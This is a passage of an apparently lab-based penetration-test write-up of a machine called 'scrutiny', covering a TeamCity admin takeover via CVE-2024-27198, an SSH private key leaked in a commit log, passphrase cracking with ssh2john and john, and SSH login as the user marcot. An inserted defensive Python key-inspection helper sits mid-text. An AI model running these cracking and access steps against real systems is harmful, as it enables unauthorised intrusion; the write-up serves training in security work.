Admin Portal
By exploiting CVE-2024-27198, an admin account was created
Logging in to the admin portal using the generated admin credential
TeamCity by JetBrains is widely respected among developers for being a powerful, highly customizable CI/CD tool that’s especially loved in enterprise and complex multi-project environments. It’s known for rock-solid stability, deep integrations (especially with JetBrains IDEs), and smart features like automatic build optimization and parallel testing. But it’s also criticized for being heavier and trickier to set up compared to cloud-native competitors like GitHub Actions or GitLab CI. Among engineering teams that prioritize control, on-prem hosting, and advanced workflows, TeamCity is considered top-tier; however, for fast-moving startups, it sometimes feels “overkill” or “too Java-heavy.” Overall, it has a strong reputation for teams that value flexibility, scalability, and security over out-of-the-box simplicity.
Commit Log
Looking at the Freelancers project, among the 4 freelancers, Marco Tillman stands out, as the user has 1 more build
Checking the commit log
Oops?
SSH Private Key
It is an SSH private key
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ nano id_rsa.marcot
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ chmod 600 ./id_rsa.marcot
Saving the SSH private key
SSH (Fail)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com -i ./id_rsa.marcot
marcot@onlyrands.com's password:
Attempting to connect to the target system via SSH with the SSH private key of the marcot user fails
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com -i ./id_rsa.marcot -v
OpenSSH_9.9p2 Debian-1, OpenSSL 3.4.1 11 Feb 2025
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: Reading configuration data /etc/ssh/ssh_config.d/20-systemd-ssh-proxy.conf
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to onlyrands.com [192.168.138.91] port 22.
debug1: Connection established.
debug1: identity file ./id_rsa.marcot type 0
debug1: identity file ./id_rsa.marcot-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.9p2 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_8.2p1 Ubuntu-4ubuntu0.11
debug1: compat_banner: match: OpenSSH_8.2p1 Ubuntu-4ubuntu0.11 pat OpenSSH* compat 0x04000000
debug1: Authenticating to onlyrands.com:22 as 'marcot'
debug1: load_hostkeys: fopen /home/kali/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ssh-ed25519
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: SSH2_MSG_KEX_ECDH_REPLY received
debug1: Server host key: ssh-ed25519 SHA256:bdEzYRpG4k3NkIr03/E2H6ltJRUD52Zi5YA0fkNr/nY
debug1: load_hostkeys: fopen /home/kali/.ssh/known_hosts2: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts: No such file or directory
debug1: load_hostkeys: fopen /etc/ssh/ssh_known_hosts2: No such file or directory
debug1: Host 'onlyrands.com' is known and matches the ED25519 host key.
debug1: Found key in /home/kali/.ssh/known_hosts:184
debug1: ssh_packet_send2_wrapped: resetting send seqnr 3
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: ssh_packet_read_poll2: resetting read seqnr 3
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_ext_info_client_parse: server-sig-algs=<ssh-ed25519,sk-ssh-ed25519@openssh.com,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,sk-ecdsa-sha2-nistp256@openssh.com>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: get_agent_identities: bound agent to hostkey
debug1: get_agent_identities: ssh_fetch_identitylist: agent contains no identities
debug1: Will attempt key: ./id_rsa.marcot RSA SHA256:dsyzOtp/tCH867zyhroVuyBzZGB26KVu06rmiHyrems explicit
debug1: Offering public key: ./id_rsa.marcot RSA SHA256:dsyzOtp/tCH867zyhroVuyBzZGB26KVu06rmiHyrems explicit
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: password
Checking the verbose log suggests that the failure comes from one of the following:
- The SSH private key is not valid
- The target SSH server is not configured to handle the key authentication
Inspection
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh-keygen -y -f ./id_rsa.marcot
Enter passphrase for "./id_rsa.marcot":
Attempting to inspect the SSH private key with ssh-keygen prompts for a passphrase. The SSH private key is passphrase-protected
Password Cracking
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh2john ./id_rsa.marcot > id_rsa.marcot.hash
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ john ./id_rsa.marcot.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cheer (./id_rsa.marcot)
1g 0:00:00:10 DONE (2025-04-08 12:11) 0.09478g/s 118.2p/s 118.2c/s 118.2C/s 753951..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Password cracked; cheer
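An added example, not part of the original write-up: a Python audit helper that finds OpenSSH private keys in text such as a commit log and reads the unencrypted header of the openssh-key-v1 format to report the cipher, KDF and bcrypt round count, the same fields behind the passphrase prompt and the cost lines John printed above. The function names and sample blobs are constructed for illustration; the sample bodies are placeholders, not real key material.

```python
import base64
import re
import struct

MAGIC = b"openssh-key-v1\x00"
PEM_RE = re.compile(r"-----BEGIN OPENSSH PRIVATE KEY-----(.*?)"
                    r"-----END OPENSSH PRIVATE KEY-----", re.S)

def _s(b):
    """Encode an SSH 'string': uint32 big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b

def _read_string(buf, off):
    """Decode one SSH 'string' at offset off; return (bytes, next offset)."""
    (n,) = struct.unpack_from(">I", buf, off)
    end = off + 4 + n
    if end > len(buf):
        raise ValueError("truncated key blob")
    return buf[off + 4:end], end

def inspect_key(blob):
    """Read the cleartext header of an openssh-key-v1 blob (no passphrase needed)."""
    if not blob.startswith(MAGIC):
        raise ValueError("not an openssh-key-v1 blob")
    off = len(MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    kdfopts, off = _read_string(blob, off)
    rounds = None
    if kdf == b"bcrypt":  # kdfoptions = string salt, uint32 rounds
        _salt, p = _read_string(kdfopts, 0)
        (rounds,) = struct.unpack_from(">I", kdfopts, p)
    return {"cipher": cipher.decode(), "kdf": kdf.decode(),
            "rounds": rounds, "encrypted": cipher != b"none"}

def find_keys(text):
    """Inspect every OpenSSH private key block found in text (e.g. a commit log)."""
    return [inspect_key(base64.b64decode(re.sub(r"\s+", "", m.group(1))))
            for m in PEM_RE.finditer(text)]

def make_sample(cipher, kdf, kdfopts):
    """Constructed sample: well-formed header, placeholder key bodies."""
    blob = MAGIC + _s(cipher) + _s(kdf) + _s(kdfopts) + struct.pack(">I", 1)
    blob += _s(b"constructed-public") + _s(b"constructed-private")
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n%s\n"
            "-----END OPENSSH PRIVATE KEY-----\n" % base64.b64encode(blob).decode())

SAMPLE = ("commit text (constructed)\n"
          + make_sample(b"aes256-ctr", b"bcrypt", _s(b"\x00" * 16) + struct.pack(">I", 16))
          + make_sample(b"none", b"none", b""))
```

A key that has appeared in a commit should be rotated whatever the header reports: as the cracking run above shows, bcrypt with 16 rounds did not protect a dictionary-word passphrase.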
SSH
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/scrutiny]
└─$ ssh marcot@onlyrands.com
marcot@onlyrands.com password: cheer
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-182-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Tue 08 Apr 2025 10:22:28 AM UTC
System load: 0.0 Processes: 224
Usage of /: 83.5% of 9.75GB Users logged in: 0
Memory usage: 64% IPv4 address for ens160: 192.168.138.91
Swap usage: 0%
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
You have mail.
Last login: Tue Apr 8 10:16:25 2025 from 192.168.45.197
marcot@onlyrands:~$ whoami
marcot
marcot@onlyrands:~$ hostname
onlyrands.com
marcot@onlyrands:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:a4:01 brd ff:ff:ff:ff:ff:ff
inet 192.168.138.91/24 brd 192.168.138.255 scope global ens160
valid_lft forever preferred_lft forever
The password also works for the marcot user
Initial foothold established on the target system as the marcot user via SSH
Key Authentication
marcot@onlyrands:~$ ll .ssh/
total 20
drwx------ 2 marcot freelancers 4096 Jun 7 2024 ./
drwxrwx---+ 5 marcot freelancers 4096 Jun 13 2024 ../
-rw------- 1 marcot freelancers 2655 Jun 7 2024 id_rsa
-rw------- 1 marcot freelancers 574 Jun 7 2024 id_rsa.pub
The key authentication failed earlier because the authorized_keys file is missing from the SSH directory of the marcot user